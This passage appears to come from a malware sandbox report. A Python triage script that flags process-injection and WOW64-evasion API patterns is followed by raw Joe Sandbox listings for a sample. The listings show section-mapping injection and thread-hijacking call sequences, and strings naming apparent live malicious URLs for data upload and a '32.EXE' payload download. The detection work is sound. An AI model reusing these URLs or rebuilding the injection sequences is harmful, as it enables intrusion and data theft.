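    remote view), and a thread-creation API resolved by name;
  * WOW64 evasion: Wow64DisableWow64FsRedirection, or an X64Call whose first
    two 32-bit arguments form a 64-bit target pointer (assumption: low/high
    split convention of the X64Call helper).
"""
import re
from dataclasses import dataclass

CALL_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"   # NtCreateSection.NTDLL
    r"(?:\((?P<args>[^)]*)\))?"                  # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"         # , ref: 0031473B
)
# PAGE_EXECUTE (0x10) through PAGE_EXECUTE_WRITECOPY (0x80)
PAGE_EXECUTE_MASK = 0xF0
THREAD_APIS = {"RtlCreateUserThread", "NtCreateThreadEx", "CreateRemoteThread"}


@dataclass
class Call:
    api: str
    module: str
    args: list   # raw tokens; '?' where the sandbox could not recover a value
    ref: int     # call-site address

    def arg_int(self, i):
        """Argument i as an int, or None if missing or unresolved ('?')."""
        if i >= len(self.args):
            return None
        tok = self.args[i]
        return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else None


def parse_calls(listing):
    """Turn one function's bullet lines into Call records (non-matching lines skipped)."""
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def triage(calls):
    """Return human-readable findings for one function's call list."""
    findings = []
    # NtCreateSection(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize,
    #                 SectionPageProtection, AllocationAttributes, FileHandle)
    exec_sections = [c for c in calls if c.api == "NtCreateSection"
                     and (c.arg_int(4) or 0) & PAGE_EXECUTE_MASK]
    maps = [c for c in calls if c.api == "NtMapViewOfSection"]
    resolved = {c.args[1] for c in calls
                if c.api == "GetProcAddress" and len(c.args) > 1}
    thread_apis = sorted(resolved & THREAD_APIS)
    if exec_sections and len(maps) >= 2 and thread_apis:
        s = exec_sections[0]
        findings.append(
            "section-mapping injection: executable section (prot=0x%02X at %08X), "
            "%d map calls, thread API %s resolved by name"
            % (s.arg_int(4), s.ref, len(maps), ", ".join(thread_apis)))
    for c in calls:
        if c.api == "Wow64DisableWow64FsRedirection":
            findings.append("fs redirection disabled at %08X" % c.ref)
        elif c.api == "X64Call" and None not in (c.arg_int(0), c.arg_int(1)):
            target = (c.arg_int(1) << 32) | c.arg_int(0)   # assumed low/high split
            findings.append("64-bit call from 32-bit code at %08X, target 0x%016X"
                            % (c.ref, target))
    return findings


# Bullet lines copied from this report's function entries: the injection function,
# and (merged into one listing) the Wow64/ExitProcess and X64Call functions.
INJECTION_LISTING = """
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000044,00000000), ref: 0031450D
• GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 00314525
• GetProcAddress.KERNEL32(?,NtCreateSection), ref: 00314537
• GetProcAddress.KERNEL32(?,NtMapViewOfSection), ref: 0031454C
• GetProcAddress.KERNEL32(?,RtlCreateUserThread), ref: 00314561
• GetCurrentProcess.KERNEL32 ref: 00314591
• NtCreateSection.NTDLL(00000000,00000006,00000000,0000091C,00000004,08000000,00000000), ref: 0031463B
• NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00314690
• NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,0000091C,00000002,00000000,00000004), ref: 003146D8
• NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 0031473B
• NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00314792
• NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 003147DA
• _memmove.LIBCMT ref: 00314806
"""
EVASION_LISTING = """
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00301C2B
• Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00301C42
• ExitProcess.KERNEL32 ref: 00301C4A
• _strlen.LIBCMT ref: 003060F7
• X64Call.DOWNLOADED_FILE(221F1B10,00007FFE,00000004,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00306145
"""

if __name__ == "__main__":
    for name, listing in (("injection", INJECTION_LISTING), ("evasion", EVASION_LISTING)):
        for finding in triage(parse_calls(listing)):
            print(name, "->", finding)
```

The first NtCreateSection (DesiredAccess 0x06, PAGE_READWRITE 0x04) is deliberately not flagged on its own; only the second, with SECTION_MAP_EXECUTE in DesiredAccess 0x0E and PAGE_EXECUTE_READWRITE 0x40, trips the rule, and the pairs of NtMapViewOfSection calls around each are what distinguish local staging plus a remote view from a plain file mapping.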
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000044,00000000), ref: 0031450D
                                                                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 00314525
                                                                                                            • GetProcAddress.KERNEL32(?,NtCreateSection), ref: 00314537
                                                                                                            • GetProcAddress.KERNEL32(?,NtMapViewOfSection), ref: 0031454C
                                                                                                            • GetProcAddress.KERNEL32(?,RtlCreateUserThread), ref: 00314561
                                                                                                            • GetProcAddress.KERNEL32(?,NtUnmapViewOfSection), ref: 00314573
                                                                                                            • GetProcAddress.KERNEL32(?,NtClose), ref: 00314585
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00314591
                                                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,0000091C,00000004,08000000,00000000), ref: 0031463B
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,0000091C,00000002,00000000,00000004), ref: 00314682
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00314690
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,0000091C,00000002,00000000,00000004), ref: 003146D8
                                                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 0031473B
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00314784
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00314792
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 003147DA
                                                                                                            • _memmove.LIBCMT ref: 00314806
                                                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 0031481F
                                                                                                            • GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 00314837
                                                                                                            • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00314851
                                                                                                            • lstrcpyW.KERNEL32(?,KERNEL32.DLL), ref: 0031486F
                                                                                                            • lstrcpyW.KERNEL32(?,USER32.DLL), ref: 00314886
                                                                                                            • lstrcpyA.KERNEL32(?,Sleep), ref: 0031489E
                                                                                                            • lstrcpyA.KERNEL32(?,LoadLibraryA), ref: 003148B6
                                                                                                            • lstrcpyA.KERNEL32(?,LocalAlloc), ref: 003148CD
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualAlloc), ref: 003148E5
                                                                                                            • lstrcpyA.KERNEL32(?,LocalFree), ref: 003148FD
                                                                                                            • lstrcpyA.KERNEL32(?,CloseHandle), ref: 00314914
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualFree), ref: 0031492C
                                                                                                            • lstrcpyA.KERNEL32(?,MessageBoxW), ref: 00314944
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualProtect), ref: 0031495B
                                                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 00314997
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 003149DD
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 003149EB
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00314A33
                                                                                                            • _memmove.LIBCMT ref: 00314A5B
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,003055B9), ref: 00314A98
                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00314AE0
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 00314B1F
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 00314B46
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 00314B57
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 00314B68
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314B79
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314B8A
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314B9B
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314BA8
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314BB5
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314BC2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314BCF
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00314BE7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314BF1
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314BFB
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314C1D
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314C2E
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314C3B
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314C4C
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314C59
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314C6A
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314C77
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00314C89
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314C93
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314C9D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Close$lstrcpy$Unmap$AddressHandleProcProcess$Create$Current$Terminate_memmove$EventLibraryLoadModuleObjectSingleThreadUserWait
                                                                                                            • String ID: CloseHandle$D$GetProcAddress$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$NtClose$NtCreateSection$NtMapViewOfSection$NtUnmapViewOfSection$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect
                                                                                                            • API String ID: 4191060109-4063295011
                                                                                                            • Opcode ID: 46932f945e7be0b7c02c4322d2cec7bc5fe6b61baed2ee4b8facf4b752a7a1e3
                                                                                                            • Instruction ID: ae6134267d67571173c451c309296a3c89f41e8980cad314f33764e250f24ddb
                                                                                                            • Opcode Fuzzy Hash: 46932f945e7be0b7c02c4322d2cec7bc5fe6b61baed2ee4b8facf4b752a7a1e3
                                                                                                            • Instruction Fuzzy Hash: F5222FB5A40218EFEB35CFA4DD89F9EB779FB48701F108598E609A7290C7746984CF60
                                                                                                            APIs
                                                                                                            • OpenEventW.KERNEL32(00100000,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 00321042
                                                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{7E105FD4-6112-4FB9-A722-91E984087449}), ref: 00321071
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003210EA
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00321149
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321534
                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0032154E
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321558
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321568
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321572
                                                                                                            Strings
                                                                                                            • {7E105FD4-6112-4FB9-A722-91E984087449}, xrefs: 00321065
                                                                                                            • {EFC3ABD3-EC58-4FCB-B5F7-D01538741E91}, xrefs: 003210A1
                                                                                                            • {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 00321036
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventMutexOpen$CreateObjectReleaseSingleWait
                                                                                                            • String ID: {7E105FD4-6112-4FB9-A722-91E984087449}${DD700AA6-D197-4A4A-838A-B93EA96F236B}${EFC3ABD3-EC58-4FCB-B5F7-D01538741E91}
                                                                                                            • API String ID: 385723476-1649484402
                                                                                                            • Opcode ID: d6d611e93e2de728b210dc9f1af347de2a067566eff1419c97f4563720f7bc47
                                                                                                            • Instruction ID: b72b12ac772d41c5a3abb0814b413ac18d29ec64ae7e4194df70a029a4c0c92c
                                                                                                            • Opcode Fuzzy Hash: d6d611e93e2de728b210dc9f1af347de2a067566eff1419c97f4563720f7bc47
                                                                                                            • Instruction Fuzzy Hash: 53E15174900314EFDB2ADFA5EE8DBAE7779BB18701F208519E206A61E0C7B859C4CF51
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000B3C), ref: 00305150
                                                                                                            • lstrcpyW.KERNEL32(00000000,{E29CBB21-643E-472E-B199-71CB48A8D055}), ref: 00305179
                                                                                                            • lstrcpyW.KERNEL32(-0000009C,{7E105FD4-6112-4FB9-A722-91E984087449}), ref: 00305191
                                                                                                            • lstrcpyW.KERNEL32(-000000EA,{2CE5F8BD-0511-45BE-87AB-414E34221A74}), ref: 003051A9
                                                                                                            • lstrcpyW.KERNEL32(-00000138,Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0), ref: 003051BF
                                                                                                            • lstrcpyW.KERNEL32(-000005EA,00376BDC), ref: 003051D7
                                                                                                            • lstrcpyW.KERNEL32(-000006B2,https://woo097878781.win/upload.php), ref: 003051EF
                                                                                                            • lstrcpyW.KERNEL32(-0000090A,{DD790A50-FBBA-44EC-A8E0-C3475C4234CA}), ref: 00305205
                                                                                                            • _memset.LIBCMT ref: 00305302
                                                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000010,4000000C,00000000,00000000), ref: 00305328
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Strings
                                                                                                            • {DD790A50-FBBA-44EC-A8E0-C3475C4234CA}, xrefs: 003051F5
                                                                                                            • {7E105FD4-6112-4FB9-A722-91E984087449}, xrefs: 0030517F
                                                                                                            • HWID_%s, xrefs: 00305388
                                                                                                            • {2CE5F8BD-0511-45BE-87AB-414E34221A74}, xrefs: 00305197, 0030558D
                                                                                                            • https://woo097878781.win/upload.php, xrefs: 003051DD
                                                                                                            • %s %s, xrefs: 00305574
                                                                                                            • https://woo097878781.win/32.EXE, xrefs: 0030543B
                                                                                                            • {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}, xrefs: 00305568
                                                                                                            • {E29CBB21-643E-472E-B199-71CB48A8D055}, xrefs: 0030516E
                                                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 003051AF, 0030542A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpy$Local$CloseFreeHandle$AllocBinaryCryptString_memset
                                                                                                            • String ID: %s %s$HWID_%s$Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0$https://woo097878781.win/32.EXE$https://woo097878781.win/upload.php${2CE5F8BD-0511-45BE-87AB-414E34221A74}${7E105FD4-6112-4FB9-A722-91E984087449}${DD790A50-FBBA-44EC-A8E0-C3475C4234CA}${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}${E29CBB21-643E-472E-B199-71CB48A8D055}
                                                                                                            • API String ID: 2754469768-1647865491
                                                                                                            • Opcode ID: 88ced15b202611c56690298a27b3dace0b7759176b0335eef1db7323af0d444f
                                                                                                            • Instruction ID: 090a177fbb6644304781238786549312d69827a0ac06fda32dbc3408e490d39d
                                                                                                            • Opcode Fuzzy Hash: 88ced15b202611c56690298a27b3dace0b7759176b0335eef1db7323af0d444f
                                                                                                            • Instruction Fuzzy Hash: 10E1BE74A11604DFD736CB50ECAAFAA77BCAB48300F009569E50EA72E1E7759AC4CF50
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316DC7
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316DF9
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316E17
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00379F18,00000004,00000000), ref: 00316E4C
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00316E8C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316EA5
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316EAF
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00316EF9
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316F31
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00316F63
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00316F81
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00379F18,00000004,00000000), ref: 00316FB5
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00316FF5
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 003170B8
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0031716A
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 00317187
                                                                                                            • closesocket.WS2_32(?), ref: 00317193
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                             • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateThread$EventResumesetsockopt$InfoLocaleObjectSingleWait___crtclosesocket
                                                                                                            • String ID: d
                                                                                                            • API String ID: 404341171-2564639436
                                                                                                            • Opcode ID: 923e2cdaa8036ba7fc9005409b7ef1e617146c89627df48e43238d3aa3addbe2
                                                                                                            • Instruction ID: 027f1f6ad97d3d08dead209f90f7cba9bbc56f62ec6e2c3db5cd311c6635c747
                                                                                                            • Opcode Fuzzy Hash: 923e2cdaa8036ba7fc9005409b7ef1e617146c89627df48e43238d3aa3addbe2
                                                                                                            • Instruction Fuzzy Hash: 96328E71A04204DFDB19CF94C899BEEBBB9FB48304F298619E516AF2D0C7749886CF50
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 003215F6
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0032163E
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 00321678
                                                                                                            • WaitForMultipleObjects.KERNEL32(00000006,?,00000000,000000FF), ref: 003218CE
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 00321BD7
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321D0F
                                                                                                            • closesocket.WS2_32(00000000), ref: 00321D23
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00321D52
                                                                                                            • shutdown.WS2_32(00000000,00000002), ref: 00321D7D
                                                                                                            • closesocket.WS2_32(00000000), ref: 00321D8A
                                                                                                            • LocalFree.KERNEL32(?), ref: 00321D9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                                                            • String ID:
                                                                                                            • API String ID: 3117981272-0
                                                                                                            • Opcode ID: b6bcd28c9bead63a4045dad91c21b9a61804a7c44694d7722cd4330d45a51dec
                                                                                                            • Instruction ID: 0ba2f6d60eeccbd7a53e5e5f4464f333ae46be8727beeeb8e7daaeab1dc5f918
                                                                                                            • Opcode Fuzzy Hash: b6bcd28c9bead63a4045dad91c21b9a61804a7c44694d7722cd4330d45a51dec
                                                                                                            • Instruction Fuzzy Hash: EB222B74A003289FDB25CF94EE89BEA7779BF98304F108199E649A7280D7B45EC4CF51
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0030A1B9
                                                                                                            • _memset.LIBCMT ref: 0030A1CA
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,00302000), ref: 0030A21B
                                                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 0030A251
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 0030A285
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 0030A290
                                                                                                            • _memmove.LIBCMT ref: 0030A2AF
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00302000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 0030A2DA
                                                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 0030A320
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0030A360
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 0030A36E
                                                                                                            • _memmove.LIBCMT ref: 0030A390
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00302000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0030A3C7
                                                                                                            • _memset.LIBCMT ref: 0030A3E8
                                                                                                            • GetThreadContext.KERNEL32(?,00010007), ref: 0030A405
                                                                                                            • WriteProcessMemory.KERNEL32(00302000,?,?,00000004,?), ref: 0030A447
                                                                                                            • SetThreadContext.KERNEL32(?,00010007), ref: 0030A461
                                                                                                            • ResumeThread.KERNEL32(?), ref: 0030A470
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 0030A486
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 0030A494
                                                                                                            • NtClose.NTDLL(00000000), ref: 0030A49E
                                                                                                            • NtClose.NTDLL(00000000), ref: 0030A4AB
                                                                                                            • NtUnmapViewOfSection.NTDLL(00302000,00000000), ref: 0030A4E6
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 0030A4F7
                                                                                                            • NtClose.NTDLL(00000000), ref: 0030A504
                                                                                                            • NtUnmapViewOfSection.NTDLL(00302000,00000000), ref: 0030A512
                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 0030A520
                                                                                                            • NtClose.NTDLL(00000000), ref: 0030A52A
                                                                                                            • CloseHandle.KERNEL32(00302000), ref: 0030A534
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0030A53E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$CloseUnmap$Process$CreateCurrentThread$ContextHandle_memmove_memset$MemoryResumeWrite
                                                                                                            • String ID: D
                                                                                                            • API String ID: 987980044-2746444292
                                                                                                            • Opcode ID: 92851107b34d950fe4635aa33778da098040353d11414eb254d578b7bab2a66d
                                                                                                            • Instruction ID: 806b76fc99fc7f1aed25e4dd8888c484ed45efc7494ba61de395be9e2ecef1e6
                                                                                                            • Opcode Fuzzy Hash: 92851107b34d950fe4635aa33778da098040353d11414eb254d578b7bab2a66d
                                                                                                            • Instruction Fuzzy Hash: 12C10EB5A10318AFDB25CFA4DD49F9EB7B9BB48700F208558F609AB290D774A981CF50
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
